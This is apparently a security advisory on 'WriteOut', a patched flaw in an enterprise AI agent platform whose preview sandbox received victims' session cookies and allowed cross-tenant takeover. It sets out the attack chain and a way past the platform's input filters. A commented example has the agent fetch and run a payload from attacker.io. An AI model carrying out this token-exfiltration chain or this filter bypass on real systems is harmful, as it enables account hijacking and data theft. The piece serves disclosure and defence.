Overview
Researchers at Sand Security have disclosed a now-patched critical vulnerability in Writer, an enterprise generative AI platform used by large organisations. Codenamed WriteOut, the flaw enabled a full cross-tenant account takeover via a single shared link — no prior foothold in the victim’s organisation required. The attack targeted Writer’s live agent preview feature, exploiting a failure to isolate session cookies from attacker-controlled sandbox environments.
The severity is underscored by what a successful attacker could access: private chats, documents, agent configurations, private model definitions, connector credentials, and LLM API keys — with potential for full administrative control depending on victim role.
Technical Analysis
The attack chain is elegantly simple and devastatingly effective:
- Attacker creates a malicious Writer agent in their own legitimate account with a live preview configured.
- Attacker shares the public preview link — no social engineering context required beyond delivering a URL.
- Victim clicks the link while authenticated to Writer. The browser attaches the victim’s session cookie to the preview request.
- Writer’s preview proxy forwards that cookie into the attacker’s sandbox — a critical design failure in session boundary enforcement.
- Attacker-controlled code inside the sandbox reads the session token from memory or forwarded headers and exfiltrates it to an external server.
- Attacker replays the token to assume full control of the victim’s Writer session.
Writer did implement input-side guardrails — filtering attempts to read environment variables or inject obviously malicious inline code. However, these checks evaluated the instruction, not runtime behaviour. The bypass was straightforward: rather than embedding the payload inline, the attacker instructed the agent to fetch and execute a remote script, entirely circumventing static input inspection.
# Conceptual bypass — agent instruction example
# Instead of inline payload (blocked):
# exec(os.environ['SESSION_TOKEN']) <-- filtered
# Attacker uses remote fetch (not filtered):
# fetch('https://attacker.io/payload.py') and execute at runtime
This illustrates a fundamental weakness in agent sandbox security: perimeter-based input filtering is insufficient when agents have network egress and dynamic code execution capabilities.
Framework Mapping
- AML.T0051 (LLM Prompt Injection): The agent was instructed to execute attacker-defined logic, abusing the agent’s instruction surface.
- AML.T0057 (LLM Data Leakage): Session tokens and sensitive account data were leaked out of the platform boundary.
- AML.T0012 (Valid Accounts): The replayed session token granted the attacker authenticated access indistinguishable from a legitimate user.
- LLM07 (Insecure Plugin Design): The preview sandbox acted as an unintended execution bridge between tenants.
- LLM08 (Excessive Agency): The sandbox had unrestricted network access enabling token exfiltration.
Impact Assessment
WriteOut is rated critical due to its zero-prerequisite exploitation model. Any authenticated Writer user across any enterprise tenant is a valid target. The attacker requires only a Writer account to craft the malicious agent. Exposure includes sensitive enterprise data, LLM API credentials, and potential for privilege escalation to org-admin level. The shared responsibility model is directly undermined as tenant isolation — a foundational enterprise security guarantee — was broken at the platform level.
Mitigation & Recommendations
- Verify patch status: Confirm your Writer environment reflects the fix that strips session cookies from sandbox preview requests and enforces isolated origins.
- Rotate credentials: Treat all Writer session tokens and stored LLM credentials as potentially compromised if exposure window overlaps with the vulnerability period.
- Restrict preview sharing: Limit agent preview link generation to verified internal users; disable public preview links where not operationally required.
- Implement runtime sandboxing controls: Block outbound network requests from agent sandboxes unless explicitly allowlisted.
- Adopt behaviour-based guardrails: Input filtering alone is insufficient — monitor runtime execution patterns within agent sandboxes.